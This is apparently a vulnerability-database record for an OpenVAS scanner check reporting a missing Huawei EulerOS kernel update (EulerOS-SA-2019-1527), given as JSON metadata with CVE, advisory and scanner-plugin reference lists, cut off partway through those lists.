Description
The remote host is missing an update for the Huawei EulerOS kernel package, as announced in security advisory EulerOS-SA-2019-1527.
Related
{"id": "OPENVAS:1361412562311220191527", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1527)", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "published": "2020-01-23T00:00:00", "modified": "2020-02-05T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191527", "reporter": "Copyright (C) 2020 Greenbone Networks GmbH", "references": ["2019-1527", "https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1527"], "cvelist": ["CVE-2015-8787", "CVE-2014-0131", "CVE-2016-4794", "CVE-2017-6074", "CVE-2014-8134", "CVE-2016-2069", "CVE-2015-5364", "CVE-2014-9410", "CVE-2017-18203", "CVE-2014-9940", "CVE-2014-1874", "CVE-2014-3181", "CVE-2015-8812", "CVE-2017-12192", "CVE-2016-0728", "CVE-2015-5327", "CVE-2016-10318", "CVE-2017-18344", "CVE-2014-9428", "CVE-2013-4470"], "immutableFields": [], "lastseen": "2020-02-05T16:38:58", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "altlinux", "idList": ["0A73C01D4DA08B819B9C4B612AFC80EC"]}, {"type": "amazon", "idList": ["ALAS-2013-252", "ALAS-2014-289", "ALAS-2015-565", "ALAS-2015-603", "ALAS-2016-642", "ALAS-2017-805", "ALAS-2017-914"]}, {"type": "android", "idList": ["ANDROID:CVE-2016-0728", "ANDROID:CVE-2016-4794"]}, {"type": "androidsecurity", "idList": ["ANDROID:2016-03-01", "ANDROID:2016-09-01", "ANDROID:2016-12-01", "ANDROID:2017-05-01", "ANDROID:2017-07-01"]}, {"type": "archlinux", "idList": ["ASA-201601-20", "ASA-201601-26", "ASA-201702-17", "ASA-201702-18"]}, {"type": "canvas", "idList": ["SHOW_TIMER_LEAK"]}, {"type": "centos", "idList": ["CESA-2013:1801", "CESA-2014:0771", "CESA-2014:1971", "CESA-2015:1623", "CESA-2015:1778", "CESA-2016:0045", "CESA-2016:0064", "CESA-2016:0855", "CESA-2016:2574", "CESA-2017:0293", 
"CESA-2017:0294", "CESA-2017:0323", "CESA-2017:0817", "CESA-2018:0151", "CESA-2018:1062", "CESA-2018:1854", "CESA-2018:3083", "CESA-2020:2430"]}, {"type": "checkpoint_security", "idList": ["CPS:SK109752"]}, {"type": "chrome", "idList": ["GCSA-4592147546557278119"]}, {"type": "cisa", "idList": ["CISA:FCB4B9C4CB605F6B805399E8D3B54A48"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:14981E32944F89BB69AF2D0158A379F0", "CFOUNDRY:539F990C3DAAC021E491E8629DA539FE", "CFOUNDRY:59BA3F002F833C86F9D716E2A3575DCB", "CFOUNDRY:897C3471765453EA05465A73CDC16BBB", "CFOUNDRY:E36E8558D6E84664F9D34B4A9E5179AC"]}, {"type": "cloudlinux", "idList": ["CLSA-2022:1650576075"]}, {"type": "cve", "idList": ["CVE-2003-1604", "CVE-2013-4470", "CVE-2014-0131", "CVE-2014-1874", "CVE-2014-3181", "CVE-2014-8134", "CVE-2014-9410", "CVE-2014-9428", "CVE-2014-9940", "CVE-2015-5327", "CVE-2015-5364", "CVE-2015-5366", "CVE-2015-8787", "CVE-2015-8812", "CVE-2016-0728", "CVE-2016-10318", "CVE-2016-2069", "CVE-2016-4794", "CVE-2016-7028", "CVE-2017-12192", "CVE-2017-15274", "CVE-2017-18203", "CVE-2017-18344", "CVE-2017-6074"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1369-1:33F82", "DEBIAN:DLA-155-1:5E8B0", "DEBIAN:DLA-310-1:EAC5D", "DEBIAN:DLA-412-1:99076", "DEBIAN:DLA-439-1:BED7A", "DEBIAN:DLA-833-1:91DAA", "DEBIAN:DSA-2906-1:5B9FC", "DEBIAN:DSA-3313-1:00F99", "DEBIAN:DSA-3313-1:C4641", "DEBIAN:DSA-3329-1:6C2DD", "DEBIAN:DSA-3329-1:93E26", "DEBIAN:DSA-3448-1:04492", "DEBIAN:DSA-3448-1:C7742", "DEBIAN:DSA-3503-1:23448", "DEBIAN:DSA-3503-1:9DDFA", "DEBIAN:DSA-3791-1:0D4D5", "DEBIAN:DSA-3791-1:AE0FD", "DEBIAN:DSA-3945-1:532A6", "DEBIAN:DSA-3945-1:A4CC7", "DEBIAN:DSA-4187-1:481CA", "DEBIAN:DSA-4187-1:E8170"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2003-1604", "DEBIANCVE:CVE-2013-4470", "DEBIANCVE:CVE-2014-0131", "DEBIANCVE:CVE-2014-1874", "DEBIANCVE:CVE-2014-3181", "DEBIANCVE:CVE-2014-8134", "DEBIANCVE:CVE-2014-9428", "DEBIANCVE:CVE-2014-9940", "DEBIANCVE:CVE-2015-5327", "DEBIANCVE:CVE-2015-5364", 
"DEBIANCVE:CVE-2015-5366", "DEBIANCVE:CVE-2015-8787", "DEBIANCVE:CVE-2015-8812", "DEBIANCVE:CVE-2016-0728", "DEBIANCVE:CVE-2016-10318", "DEBIANCVE:CVE-2016-2069", "DEBIANCVE:CVE-2016-4794", "DEBIANCVE:CVE-2017-12192", "DEBIANCVE:CVE-2017-15274", "DEBIANCVE:CVE-2017-18203", "DEBIANCVE:CVE-2017-18344", "DEBIANCVE:CVE-2017-6074"]}, {"type": "exploitdb", "idList": ["EDB-ID:39277", "EDB-ID:40003", "EDB-ID:41458", "EDB-ID:45175"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:3459535A8A480A3A2F164DB01F4CF994", "EXPLOITPACK:4CC02E891FC223E9BA1344151AC6958F", "EXPLOITPACK:4EEB4BE9E101A3B6E5FA4A3FC9B06CCD", "EXPLOITPACK:84D4B1F42D5DCA9623080EFFD17E58E1", "EXPLOITPACK:CC3E0CE0239066A83BA64B22929DBCEC"]}, {"type": "f5", "idList": ["F5:K01948202", "F5:K07020416", "F5:K10164113", "F5:K15699", "F5:K17120", "F5:K17307", "F5:K17309", "F5:K33567812", "F5:K41101201", "F5:K44500413", "F5:K80758444", "F5:K82508682", "SOL01948202", "SOL10164113", "SOL15699", "SOL17120", "SOL17121", "SOL17307", "SOL17309", "SOL80758444"]}, {"type": "fedora", "idList": ["FEDORA:02EB96052912", "FEDORA:0777460874C8", "FEDORA:0960721640", "FEDORA:0D267606CFB3", "FEDORA:0D8242218A", "FEDORA:131186087E1C", "FEDORA:1317A20FE4", "FEDORA:1661D600FD84", "FEDORA:1835E22100", "FEDORA:18E4222173", "FEDORA:1AE8521943", "FEDORA:1CCC322073", "FEDORA:1DA3D221C6", "FEDORA:1F466601E823", "FEDORA:23B6E225A0", "FEDORA:2417521BFF", "FEDORA:26C5127E25", "FEDORA:26DF321BA7", "FEDORA:2784A21C29", "FEDORA:280D922723", "FEDORA:28A7021A1E", "FEDORA:2A0322BA2C", "FEDORA:2BA602158D", "FEDORA:2EEE52123F", "FEDORA:2F13360877A3", "FEDORA:3060D60E9A21", "FEDORA:30991220A7", "FEDORA:30C5820E79", "FEDORA:33D8860877E1", "FEDORA:3595F21BB4", "FEDORA:39B5660877A6", "FEDORA:4359160906D1", "FEDORA:4375D611D164", "FEDORA:453986087A76", "FEDORA:4A2C76087582", "FEDORA:4F15F6087C54", "FEDORA:51EB2601616F", "FEDORA:56A5821917", "FEDORA:57F742243A", "FEDORA:60B8C60918D5", "FEDORA:6437E61257FA", "FEDORA:67FB6618BD69", "FEDORA:6800622747", 
"FEDORA:6A93C20D15", "FEDORA:756F822091", "FEDORA:7734E613B647", "FEDORA:84C4E22D8F", "FEDORA:8BF45213A1", "FEDORA:8C61D2154D", "FEDORA:8E01360DC908", "FEDORA:8EFBC604949F", "FEDORA:92F5160877B4", "FEDORA:9330A21FE6", "FEDORA:936A4223EA", "FEDORA:9FA6021249", "FEDORA:A4C8660C350E", "FEDORA:A5C89601FC0F", "FEDORA:AE219254B2", "FEDORA:B72CD214AC", "FEDORA:B7EB96087DBD", "FEDORA:B81A721D1C", "FEDORA:B9C4760130DC", "FEDORA:B9F6A606511F", "FEDORA:BD41660BC2B1", "FEDORA:C26F460906BA", "FEDORA:C35B860CD859", "FEDORA:C56CF6087715", "FEDORA:CE3236087E07", "FEDORA:CFDB8604972F", "FEDORA:D0CC960762B3", "FEDORA:D15E060F33C2", "FEDORA:D69CC24B48", "FEDORA:DA71D21D19", "FEDORA:DB49F219DE", "FEDORA:DE40F21338", "FEDORA:E1CE2605E17A", "FEDORA:E6C59213CA", "FEDORA:E7CE72245B", "FEDORA:E99C02072E", "FEDORA:F015721408"]}, {"type": "hackerone", "idList": ["H1:347282"]}, {"type": "hp", "idList": ["HP:C05018265"]}, {"type": "ibm", "idList": ["0C9BE2F3A245999460BB6BC497E21EC27992E79FB4C1D769E6D1CF729AB33300", "2ABC4CD376C07922A3144CF8116D979F4BDDE16EED9AADA11262FBF58C851DBF", "3EB2D1CBDE6F39F65F1D781A1439298F76DA3A8C8C722E723825134FB37DDB9E", "50D485C935533CE40EA67F7999EFEC0CD0087E4C2E7926EFF7DCB22671BD3052", "61EAA34D5E4645B71F124164E8135272DB3119CF3ABDC2864377B692FCF87527", "658C6A388449448220E16F3A05A122A56F35F4A9A9370C4B63DC0779B971B6CE", "6F75059EBDF719D84C8DC0CA4BAADF9428544BDAFCEEAE62F4225A55CA1E8AF0", "72A14F3E1A05E87987247C3A94DA37A971910E734C842EA2FD4E32CE8B24FCF5", "A0B51C5217767E75AB974BA93584FB1F969514BA8D7EE9EDD025C20F274C1D2F", "A3ECA2FADF3E248DCF026E08D24250DA5644166428EA8CC2D77F20F0FD2FCE99", "AF6E3EC9D5A5C3CF688EF87142347E0688A4AE1CB6831F92326966B86BF2D9C1", "B7EDA2450D13E204B60C3A3E7379E6FCCD587CB32FEB5041ADDA6CB8E3C44FC3", "CD9B5BF488F3327F1A5D08B8A25E9EF90D7304376F44A16FB3F05E06566E80FF", "F092FBBD34304315E258962CA397F72D24D88CD673A181734FDCE39754098484"]}, {"type": "kitploit", "idList": ["KITPLOIT:4462385753504235463"]}, {"type": "lenovo", "idList": 
["LENOVO:PS500107-NOSID", "LENOVO:PS500321-NOSID"]}, {"type": "mageia", "idList": ["MGASA-2013-0342", "MGASA-2013-0343", "MGASA-2013-0344", "MGASA-2013-0345", "MGASA-2013-0346", "MGASA-2013-0371", "MGASA-2013-0372", "MGASA-2013-0373", "MGASA-2013-0374", "MGASA-2013-0375", "MGASA-2015-0006", "MGASA-2015-0070", "MGASA-2015-0075", "MGASA-2015-0076", "MGASA-2015-0077", "MGASA-2015-0078", "MGASA-2016-0031", "MGASA-2016-0032", "MGASA-2016-0033", "MGASA-2016-0225", "MGASA-2016-0232", "MGASA-2016-0233", "MGASA-2016-0271", "MGASA-2016-0283", "MGASA-2016-0284", "MGASA-2017-0063", "MGASA-2017-0064", "MGASA-2017-0065", "MGASA-2018-0062", "MGASA-2018-0063", "MGASA-2018-0064"]}, {"type": "myhack58", "idList": ["MYHACK58:62201783679", "MYHACK58:62201783692"]}, {"type": "nessus", "idList": ["ALA_ALAS-2013-252.NASL", "ALA_ALAS-2014-289.NASL", "ALA_ALAS-2015-565.NASL", "ALA_ALAS-2015-603.NASL", "ALA_ALAS-2016-642.NASL", "ALA_ALAS-2017-805.NASL", "ALA_ALAS-2017-914.NASL", "CENTOS_RHSA-2013-1801.NASL", "CENTOS_RHSA-2014-0771.NASL", "CENTOS_RHSA-2014-1971.NASL", "CENTOS_RHSA-2015-1623.NASL", "CENTOS_RHSA-2015-1778.NASL", "CENTOS_RHSA-2016-0045.NASL", "CENTOS_RHSA-2016-0064.NASL", "CENTOS_RHSA-2016-0855.NASL", "CENTOS_RHSA-2016-2574.NASL", "CENTOS_RHSA-2017-0293.NASL", "CENTOS_RHSA-2017-0294.NASL", "CENTOS_RHSA-2017-0323.NASL", "CENTOS_RHSA-2017-0817.NASL", "CENTOS_RHSA-2018-0151.NASL", "CENTOS_RHSA-2018-1062.NASL", "CENTOS_RHSA-2018-1854.NASL", "CENTOS_RHSA-2018-3083.NASL", "CENTOS_RHSA-2020-2430.NASL", "DEBIAN_DLA-1369.NASL", "DEBIAN_DLA-155.NASL", "DEBIAN_DLA-310.NASL", "DEBIAN_DLA-412.NASL", "DEBIAN_DLA-439.NASL", "DEBIAN_DLA-833.NASL", "DEBIAN_DSA-2906.NASL", "DEBIAN_DSA-3313.NASL", "DEBIAN_DSA-3329.NASL", "DEBIAN_DSA-3448.NASL", "DEBIAN_DSA-3503.NASL", "DEBIAN_DSA-3791.NASL", "DEBIAN_DSA-3945.NASL", "DEBIAN_DSA-4187.NASL", "EULEROS_SA-2016-1020.NASL", "EULEROS_SA-2017-1056.NASL", "EULEROS_SA-2017-1057.NASL", "EULEROS_SA-2017-1122.NASL", "EULEROS_SA-2017-1123.NASL", 
"EULEROS_SA-2017-1271.NASL", "EULEROS_SA-2017-1292.NASL", "EULEROS_SA-2018-1054.NASL", "EULEROS_SA-2018-1133.NASL", "EULEROS_SA-2018-1246.NASL", "EULEROS_SA-2018-1360.NASL", "EULEROS_SA-2018-1369.NASL", "EULEROS_SA-2018-1406.NASL", "EULEROS_SA-2019-1475.NASL", "EULEROS_SA-2019-1477.NASL", "EULEROS_SA-2019-1479.NASL", "EULEROS_SA-2019-1480.NASL", "EULEROS_SA-2019-1485.NASL", "EULEROS_SA-2019-1488.NASL", "EULEROS_SA-2019-1489.NASL", "EULEROS_SA-2019-1491.NASL", "EULEROS_SA-2019-1494.NASL", "EULEROS_SA-2019-1499.NASL", "EULEROS_SA-2019-1501.NASL", "EULEROS_SA-2019-1502.NASL", "EULEROS_SA-2019-1527.NASL", "F5_BIGIP_SOL07020416.NASL", "F5_BIGIP_SOL15699.NASL", "F5_BIGIP_SOL17307.NASL", "F5_BIGIP_SOL17309.NASL", "F5_BIGIP_SOL82508682.NASL", "FEDORA_2013-20547.NASL", "FEDORA_2013-20705.NASL", "FEDORA_2013-20748.NASL", "FEDORA_2014-11008.NASL", "FEDORA_2014-11031.NASL", "FEDORA_2014-11097.NASL", "FEDORA_2014-17244.NASL", "FEDORA_2014-17283.NASL", "FEDORA_2014-17293.NASL", "FEDORA_2014-2576.NASL", "FEDORA_2014-4317.NASL", "FEDORA_2014-4360.NASL", "FEDORA_2015-0515.NASL", "FEDORA_2015-0517.NASL", "FEDORA_2016-2F25D12C51.NASL", "FEDORA_2016-5D43766E33.NASL", "FEDORA_2016-7E12AE5359.NASL", "FEDORA_2016-9FBE2C258B.NASL", "FEDORA_2016-B59FD603BE.NASL", "FEDORA_2016-E7162262B0.NASL", "FEDORA_2017-4B9F61C68D.NASL", "FEDORA_2017-F519EBB3C4.NASL", "MANDRIVA_MDVSA-2013-265.NASL", "MANDRIVA_MDVSA-2014-124.NASL", "MANDRIVA_MDVSA-2014-155.NASL", "MANDRIVA_MDVSA-2014-201.NASL", "MANDRIVA_MDVSA-2015-058.NASL", "NEWSTART_CGSL_NS-SA-2019-0004_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2019-0014_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2019-0044_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2019-0049_KERNEL-RT.NASL", "NEWSTART_CGSL_NS-SA-2019-0070_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2019-0074_KERNEL-RT.NASL", "NEWSTART_CGSL_NS-SA-2019-0113_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2019-0152_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2022-0001_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2022-0075_KERNEL.NASL", "OPENSUSE-2014-375.NASL", 
"OPENSUSE-2014-376.NASL", "OPENSUSE-2014-478.NASL", "OPENSUSE-2014-493.NASL", "OPENSUSE-2014-791.NASL", "OPENSUSE-2014-793.NASL", "OPENSUSE-2015-301.NASL", "OPENSUSE-2015-302.NASL", "OPENSUSE-2015-543.NASL", "OPENSUSE-2016-1015.NASL", "OPENSUSE-2016-1076.NASL", "OPENSUSE-2016-116.NASL", "OPENSUSE-2016-124.NASL", "OPENSUSE-2016-136.NASL", "OPENSUSE-2016-1410.NASL", "OPENSUSE-2016-256.NASL", "OPENSUSE-2016-445.NASL", "OPENSUSE-2016-518.NASL", "OPENSUSE-2016-869.NASL", "OPENSUSE-2017-286.NASL", "OPENSUSE-2017-287.NASL", "OPENSUSE-2017-562.NASL", "OPENSUSE-2018-826.NASL", "OPENSUSE-2018-885.NASL", "OPENSUSE-2019-597.NASL", "ORACLELINUX_ELSA-2013-1801.NASL", "ORACLELINUX_ELSA-2013-2587.NASL", "ORACLELINUX_ELSA-2013-2588.NASL", "ORACLELINUX_ELSA-2013-2589.NASL", "ORACLELINUX_ELSA-2014-0771.NASL", "ORACLELINUX_ELSA-2014-1971.NASL", "ORACLELINUX_ELSA-2014-3002.NASL", "ORACLELINUX_ELSA-2014-3042.NASL", "ORACLELINUX_ELSA-2014-3043.NASL", "ORACLELINUX_ELSA-2014-3084.NASL", "ORACLELINUX_ELSA-2014-3085.NASL", "ORACLELINUX_ELSA-2014-3086.NASL", "ORACLELINUX_ELSA-2014-3096.NASL", "ORACLELINUX_ELSA-2014-3104.NASL", "ORACLELINUX_ELSA-2015-0290.NASL", "ORACLELINUX_ELSA-2015-1623.NASL", "ORACLELINUX_ELSA-2015-1778.NASL", "ORACLELINUX_ELSA-2015-3012.NASL", "ORACLELINUX_ELSA-2015-3071.NASL", "ORACLELINUX_ELSA-2015-3072.NASL", "ORACLELINUX_ELSA-2015-3073.NASL", "ORACLELINUX_ELSA-2015-3098.NASL", "ORACLELINUX_ELSA-2016-0045.NASL", "ORACLELINUX_ELSA-2016-0064.NASL", "ORACLELINUX_ELSA-2016-0855.NASL", "ORACLELINUX_ELSA-2016-2574.NASL", "ORACLELINUX_ELSA-2016-3509.NASL", "ORACLELINUX_ELSA-2016-3510.NASL", "ORACLELINUX_ELSA-2016-3596.NASL", "ORACLELINUX_ELSA-2016-3644.NASL", "ORACLELINUX_ELSA-2017-0293.NASL", "ORACLELINUX_ELSA-2017-0294.NASL", "ORACLELINUX_ELSA-2017-0323.NASL", "ORACLELINUX_ELSA-2017-0817.NASL", "ORACLELINUX_ELSA-2017-1842-1.NASL", "ORACLELINUX_ELSA-2017-3520.NASL", "ORACLELINUX_ELSA-2017-3521.NASL", "ORACLELINUX_ELSA-2017-3522.NASL", "ORACLELINUX_ELSA-2017-3534.NASL", 
"ORACLELINUX_ELSA-2017-3567.NASL", "ORACLELINUX_ELSA-2017-3640.NASL", "ORACLELINUX_ELSA-2017-3651.NASL", "ORACLELINUX_ELSA-2017-3659.NASL", "ORACLELINUX_ELSA-2018-0151.NASL", "ORACLELINUX_ELSA-2018-1062.NASL", "ORACLELINUX_ELSA-2018-1854.NASL", "ORACLELINUX_ELSA-2018-3083.NASL", "ORACLELINUX_ELSA-2018-4071.NASL", "ORACLELINUX_ELSA-2018-4114.NASL", "ORACLELINUX_ELSA-2018-4164.NASL", "ORACLELINUX_ELSA-2018-4196.NASL", "ORACLELINUX_ELSA-2018-4211.NASL", "ORACLELINUX_ELSA-2018-4214.NASL", "ORACLELINUX_ELSA-2019-4642.NASL", "ORACLELINUX_ELSA-2019-4742.NASL", "ORACLELINUX_ELSA-2020-2430.NASL", "ORACLELINUX_ELSA-2021-9486.NASL", "ORACLELINUX_ELSA-2021-9487.NASL", "ORACLEVM_OVMSA-2015-0040.NASL", "ORACLEVM_OVMSA-2015-0114.NASL", "ORACLEVM_OVMSA-2015-0147.NASL", "ORACLEVM_OVMSA-2016-0005.NASL", "ORACLEVM_OVMSA-2016-0037.NASL", "ORACLEVM_OVMSA-2016-0100.NASL", "ORACLEVM_OVMSA-2016-0162.NASL", "ORACLEVM_OVMSA-2017-0044.NASL", "ORACLEVM_OVMSA-2017-0045.NASL", "ORACLEVM_OVMSA-2017-0046.NASL", "ORACLEVM_OVMSA-2017-0057.NASL", "ORACLEVM_OVMSA-2017-0106.NASL", "ORACLEVM_OVMSA-2017-0169.NASL", "ORACLEVM_OVMSA-2017-0172.NASL", "ORACLEVM_OVMSA-2017-0174.NASL", "ORACLEVM_OVMSA-2018-0035.NASL", "ORACLEVM_OVMSA-2018-0223.NASL", "ORACLEVM_OVMSA-2018-0237.NASL", "ORACLEVM_OVMSA-2018-0247.NASL", "ORACLEVM_OVMSA-2019-0022.NASL", "PHOTONOS_PHSA-2017-0006.NASL", "PHOTONOS_PHSA-2017-0006_LINUX.NASL", "RANCHEROS_0_8_1.NASL", "RANCHEROS_1_1_1.NASL", "REDHAT-RHSA-2013-1801.NASL", "REDHAT-RHSA-2013-1802.NASL", "REDHAT-RHSA-2014-0100.NASL", "REDHAT-RHSA-2014-0284.NASL", "REDHAT-RHSA-2014-0439.NASL", "REDHAT-RHSA-2014-0771.NASL", "REDHAT-RHSA-2014-0815.NASL", "REDHAT-RHSA-2014-1318.NASL", "REDHAT-RHSA-2014-1971.NASL", "REDHAT-RHSA-2015-1623.NASL", "REDHAT-RHSA-2015-1778.NASL", "REDHAT-RHSA-2015-1787.NASL", "REDHAT-RHSA-2015-1788.NASL", "REDHAT-RHSA-2016-0045.NASL", "REDHAT-RHSA-2016-0064.NASL", "REDHAT-RHSA-2016-0065.NASL", "REDHAT-RHSA-2016-0068.NASL", "REDHAT-RHSA-2016-0103.NASL", 
"REDHAT-RHSA-2016-0855.NASL", "REDHAT-RHSA-2016-1096.NASL", "REDHAT-RHSA-2016-1100.NASL", "REDHAT-RHSA-2016-1225.NASL", "REDHAT-RHSA-2016-2574.NASL", "REDHAT-RHSA-2016-2584.NASL", "REDHAT-RHSA-2017-0293.NASL", "REDHAT-RHSA-2017-0294.NASL", "REDHAT-RHSA-2017-0295.NASL", "REDHAT-RHSA-2017-0316.NASL", "REDHAT-RHSA-2017-0323.NASL", "REDHAT-RHSA-2017-0324.NASL", "REDHAT-RHSA-2017-0345.NASL", "REDHAT-RHSA-2017-0346.NASL", "REDHAT-RHSA-2017-0347.NASL", "REDHAT-RHSA-2017-0365.NASL", "REDHAT-RHSA-2017-0366.NASL", "REDHAT-RHSA-2017-0403.NASL", "REDHAT-RHSA-2017-0501.NASL", "REDHAT-RHSA-2017-0817.NASL", "REDHAT-RHSA-2017-0932.NASL", "REDHAT-RHSA-2017-1209.NASL", "REDHAT-RHSA-2018-0151.NASL", "REDHAT-RHSA-2018-0152.NASL", "REDHAT-RHSA-2018-0181.NASL", "REDHAT-RHSA-2018-0654.NASL", "REDHAT-RHSA-2018-0676.NASL", "REDHAT-RHSA-2018-1062.NASL", "REDHAT-RHSA-2018-1854.NASL", "REDHAT-RHSA-2018-2948.NASL", "REDHAT-RHSA-2018-3083.NASL", "REDHAT-RHSA-2018-3096.NASL", "REDHAT-RHSA-2018-3459.NASL", "REDHAT-RHSA-2018-3540.NASL", "REDHAT-RHSA-2018-3586.NASL", "REDHAT-RHSA-2018-3590.NASL", "REDHAT-RHSA-2018-3591.NASL", "REDHAT-RHSA-2019-4154.NASL", "REDHAT-RHSA-2020-2430.NASL", "SL_20131212_KERNEL_ON_SL6_X.NASL", "SL_20140619_KERNEL_ON_SL6_X.NASL", "SL_20141209_KERNEL_ON_SL7_X.NASL", "SL_20150813_KERNEL_ON_SL6_X.NASL", "SL_20150915_KERNEL_ON_SL7_X.NASL", "SL_20160119_KERNEL_ON_SL5_X.NASL", "SL_20160125_KERNEL_ON_SL7_X.NASL", "SL_20160510_KERNEL_ON_SL6_X.NASL", "SL_20161103_KERNEL_ON_SL7_X.NASL", "SL_20170222_KERNEL_ON_SL6_X.NASL", "SL_20170222_KERNEL_ON_SL7_X.NASL", "SL_20170224_KERNEL_ON_SL5_X.NASL", "SL_20170321_KERNEL_ON_SL6_X.NASL", "SL_20180125_KERNEL_ON_SL7_X.NASL", "SL_20180410_KERNEL_ON_SL7_X.NASL", "SL_20180619_KERNEL_ON_SL6_X.NASL", "SL_20181030_KERNEL_ON_SL7_X.NASL", "SL_20200610_KERNEL_ON_SL6_X.NASL", "SUSE_11_KERNEL-140321.NASL", "SUSE_11_KERNEL-140408.NASL", "SUSE_11_KERNEL-140709.NASL", "SUSE_11_KERNEL-141202.NASL", "SUSE_11_KERNEL-141217.NASL", "SUSE_11_KERNEL-150306.NASL", 
"SUSE_SU-2014-0287-1.NASL", "SUSE_SU-2014-0536-1.NASL", "SUSE_SU-2014-0832-1.NASL", "SUSE_SU-2015-0481-1.NASL", "SUSE_SU-2015-0812-1.NASL", "SUSE_SU-2015-1324-1.NASL", "SUSE_SU-2015-1478-1.NASL", "SUSE_SU-2015-1611-1.NASL", "SUSE_SU-2015-1678-1.NASL", "SUSE_SU-2016-0186-1.NASL", "SUSE_SU-2016-0205-1.NASL", "SUSE_SU-2016-0585-1.NASL", "SUSE_SU-2016-0785-1.NASL", "SUSE_SU-2016-0911-1.NASL", "SUSE_SU-2016-1019-1.NASL", "SUSE_SU-2016-1203-1.NASL", "SUSE_SU-2016-2074-1.NASL", "SUSE_SU-2017-1183-1.NASL", "SUSE_SU-2017-1247-1.NASL", "SUSE_SU-2017-1301-1.NASL", "SUSE_SU-2017-1360-1.NASL", "SUSE_SU-2017-2525-1.NASL", "SUSE_SU-2017-2908-1.NASL", "SUSE_SU-2017-2920-1.NASL", "SUSE_SU-2017-3265-1.NASL", "SUSE_SU-2018-0040-1.NASL", "SUSE_SU-2018-1080-1.NASL", "SUSE_SU-2018-1172-1.NASL", "SUSE_SU-2018-1220-1.NASL", "SUSE_SU-2018-1221-1.NASL", "SUSE_SU-2018-2223-1.NASL", "SUSE_SU-2018-2328-1.NASL", "SUSE_SU-2018-2344-1.NASL", "SUSE_SU-2018-2344-2.NASL", "SUSE_SU-2018-2374-1.NASL", "SUSE_SU-2018-2387-1.NASL", "SUSE_SU-2018-2391-1.NASL", "SUSE_SU-2018-2416-1.NASL", "UBUNTU_USN-2040-1.NASL", "UBUNTU_USN-2042-1.NASL", "UBUNTU_USN-2043-1.NASL", "UBUNTU_USN-2049-1.NASL", "UBUNTU_USN-2066-1.NASL", "UBUNTU_USN-2069-1.NASL", "UBUNTU_USN-2073-1.NASL", "UBUNTU_USN-2128-1.NASL", "UBUNTU_USN-2129-1.NASL", "UBUNTU_USN-2133-1.NASL", "UBUNTU_USN-2135-1.NASL", "UBUNTU_USN-2136-1.NASL", "UBUNTU_USN-2137-1.NASL", "UBUNTU_USN-2138-1.NASL", "UBUNTU_USN-2140-1.NASL", "UBUNTU_USN-2233-1.NASL", "UBUNTU_USN-2234-1.NASL", "UBUNTU_USN-2283-1.NASL", "UBUNTU_USN-2285-1.NASL", "UBUNTU_USN-2286-1.NASL", "UBUNTU_USN-2287-1.NASL", "UBUNTU_USN-2289-1.NASL", "UBUNTU_USN-2376-1.NASL", "UBUNTU_USN-2378-1.NASL", "UBUNTU_USN-2379-1.NASL", "UBUNTU_USN-2441-1.NASL", "UBUNTU_USN-2442-1.NASL", "UBUNTU_USN-2443-1.NASL", "UBUNTU_USN-2445-1.NASL", "UBUNTU_USN-2446-1.NASL", "UBUNTU_USN-2447-1.NASL", "UBUNTU_USN-2447-2.NASL", "UBUNTU_USN-2448-1.NASL", "UBUNTU_USN-2448-2.NASL", "UBUNTU_USN-2515-1.NASL", "UBUNTU_USN-2515-2.NASL", 
"UBUNTU_USN-2516-1.NASL", "UBUNTU_USN-2516-2.NASL", "UBUNTU_USN-2516-3.NASL", "UBUNTU_USN-2517-1.NASL", "UBUNTU_USN-2518-1.NASL", "UBUNTU_USN-2680-1.NASL", "UBUNTU_USN-2681-1.NASL", "UBUNTU_USN-2682-1.NASL", "UBUNTU_USN-2683-1.NASL", "UBUNTU_USN-2684-1.NASL", "UBUNTU_USN-2685-1.NASL", "UBUNTU_USN-2713-1.NASL", "UBUNTU_USN-2870-1.NASL", "UBUNTU_USN-2870-2.NASL", "UBUNTU_USN-2871-1.NASL", "UBUNTU_USN-2871-2.NASL", "UBUNTU_USN-2872-1.NASL", "UBUNTU_USN-2872-2.NASL", "UBUNTU_USN-2872-3.NASL", "UBUNTU_USN-2873-1.NASL", "UBUNTU_USN-2889-1.NASL", "UBUNTU_USN-2889-2.NASL", "UBUNTU_USN-2890-1.NASL", "UBUNTU_USN-2890-2.NASL", "UBUNTU_USN-2890-3.NASL", "UBUNTU_USN-2908-1.NASL", "UBUNTU_USN-2908-2.NASL", "UBUNTU_USN-2908-3.NASL", "UBUNTU_USN-2908-4.NASL", "UBUNTU_USN-2908-5.NASL", "UBUNTU_USN-2931-1.NASL", "UBUNTU_USN-2932-1.NASL", "UBUNTU_USN-2946-1.NASL", "UBUNTU_USN-2946-2.NASL", "UBUNTU_USN-2947-1.NASL", "UBUNTU_USN-2947-2.NASL", "UBUNTU_USN-2947-3.NASL", "UBUNTU_USN-2948-1.NASL", "UBUNTU_USN-2948-2.NASL", "UBUNTU_USN-2949-1.NASL", "UBUNTU_USN-2967-1.NASL", "UBUNTU_USN-2989-1.NASL", "UBUNTU_USN-2998-1.NASL", "UBUNTU_USN-3053-1.NASL", "UBUNTU_USN-3054-1.NASL", "UBUNTU_USN-3055-1.NASL", "UBUNTU_USN-3056-1.NASL", "UBUNTU_USN-3057-1.NASL", "UBUNTU_USN-3206-1.NASL", "UBUNTU_USN-3207-1.NASL", "UBUNTU_USN-3207-2.NASL", "UBUNTU_USN-3208-1.NASL", "UBUNTU_USN-3208-2.NASL", "UBUNTU_USN-3209-1.NASL", "UBUNTU_USN-3335-1.NASL", 